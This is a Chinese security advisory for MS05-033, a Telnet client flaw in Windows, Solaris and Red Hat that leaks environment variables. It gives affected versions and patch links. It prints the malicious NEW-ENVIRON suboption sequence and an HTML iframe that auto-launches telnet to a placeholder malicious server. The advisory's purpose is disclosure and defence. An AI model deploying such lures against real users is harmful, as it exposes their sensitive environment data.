多家厂商Telnet客户端环境变量信息泄露漏洞(MS0…

2008-04-09 04:25:35来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

多家厂商Telnet客户端环境变量信息泄露漏洞(MS05-033)

发布日期:2005-06-15
更新日期:2005-06-15

受影响系统:
Microsoft Windows XP SP2
Microsoft Windows XP SP1
Microsoft Windows Services for UNIX 3.5
Microsoft Windows Services for UNIX 3.0
Microsoft Windows Services for UNIX 2.2
RedHat Linux Advanced Workstation 2.1
Sun Solaris 9.0_x86 Update 2
Sun Solaris 9.0_x86
Sun Solaris 9.0
Sun Solaris 8.0_x86
Sun Solaris 8.0
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.8
Sun Solaris 2.7 sparc
Sun Solaris 2.7
Sun Solaris 10.0
Sun SunOS 5.9_x86
Sun SunOS 5.9
Sun SunOS 5.8_x86
Sun SunOS 5.8
Sun SunOS 5.7_x86
Sun SunOS 5.7
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux ES 2.1
RedHat Enterprise Linux Desktop 4
RedHat Enterprise Linux AS 4
RedHat Enterprise Linux AS 3
RedHat Enterprise Linux AS 2.1
RedHat Desktop 3.0
Sun SEAM 1.0.2
Sun SEAM 1.0.1
Sun SEAM 1.0
MIT Kerberos 5 1.3.6
不受影响系统:
Microsoft Windows ME
Microsoft Windows 98se
Microsoft Windows 98
Microsoft Windows 2000SP4
Microsoft Windows 2000SP3
描述:
BUGTRAQ ID: 13940
CVE(CAN) ID: CVE-2005-1205,CVE-2005-0488

TELNET协议允许虚拟网络终端通过Internet进行连接。

多家厂商的Telnet客户端存在设计错误,可能允许远程攻击者获得受攻击系统的敏感信息。

具体的说,Telnet客户端在处理NEW-ENVIRON子协商选项时会触发这个漏洞,恶意的服务器可以向已连接的客户端发送以下Telnet子协商选项:

SB NEW-ENVIRON SEND ENV_USERVAR <name of environment variable> SE

然后有漏洞的客户端就会发回环境变量的内容,这其中可能包含有敏感信息。

如果要利用这个漏洞,攻击者必须诱骗用户连接到恶意的服务器。可能通过网页自动启动telnet命令,如:

<html><body>
<iframe src='telnet://malicious.server/'>
</body>

一旦打开了这个网页,就会自动启动telnet客户端并试图连接到主机“malicious.server”。

<*来源:Ga&euml;l Delalleau (gael.delalleau moz@m4x.org)
iDEFENSE

链接:http://www.idefense.com/application/poi/display?id=260&type=vulnerabilities
http://www.microsoft.com/technet/security/Bulletin/MS05-033.mspx
http://www.us-cert.gov/cas/techalerts/TA05-165A.html
http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-101671-1
http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-101665-1
http://lwn.net/Alerts/139795/?format=printable
*>

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 对于Windows平台,注销默认的Telnet客户端。

厂商补丁:

Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS05-033)以及相应补丁:
MS05-033:Vulnerability in Telnet Client Could Allow Information Disclosure (896428)
链接:http://www.microsoft.com/technet/security/Bulletin/MS05-033.mspx

RedHat
------
RedHat已经为此发布了一个安全公告(RHSA-2005-504-00)以及相应补丁:
RHSA-2005-504-00:Moderate: telnet security update
链接:http://lwn.net/Alerts/139795/?format=printable

补丁下载:

Red Hat Enterprise Linux AS (Advanced Server) version 2.1:

SRPMS:
ftp://updates.redhat.com/enterprise/2.1AS/en/os/SRPMS/tel...
29916c3c5d489abe67b924e5632eb181 telnet-0.17-20.EL2.4.src.rpm

i386:
c60a0c2b5f95fce95ca50bff53026acf telnet-0.17-20.EL2.4.i386.rpm
a058fc85f4236cb0c636159aa7d633ce telnet-server-0.17-20.EL2.4.i386.rpm

ia64:
5b47dc975fa30ec5cd2ca87688d88a75 telnet-0.17-20.EL2.4.ia64.rpm
dfcb49651938529dc80948e6b2e590ac telnet-server-0.17-20.EL2.4.ia64.rpm

Red Hat Linux Advanced Workstation 2.1:

SRPMS:
ftp://updates.redhat.com/enterprise/2.1AW/en/os/SRPMS/tel...
29916c3c5d489abe67b924e5632eb181 telnet-0.17-20.EL2.4.src.rpm

ia64:
5b47dc975fa30ec5cd2ca87688d88a75 telnet-0.17-20.EL2.4.ia64.rpm
dfcb49651938529dc80948e6b2e590ac telnet-server-0.17-20.EL2.4.ia64.rpm

Red Hat Enterprise Linux ES version 2.1:

SRPMS:
ftp://updates.redhat.com/enterprise/2.1ES/en/os/SRPMS/tel...
29916c3c5d489abe67b924e5632eb181 telnet-0.17-20.EL2.4.src.rpm

i386:
c60a0c2b5f95fce95ca50bff53026acf telnet-0.17-20.EL2.4.i386.rpm
a058fc85f4236cb0c636159aa7d633ce telnet-server-0.17-20.EL2.4.i386.rpm

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:Microsoft ISA Server畸形HTTP内容绕过限制漏洞(MS05-034)

下一篇:Mambo com_content远程SQL注入漏洞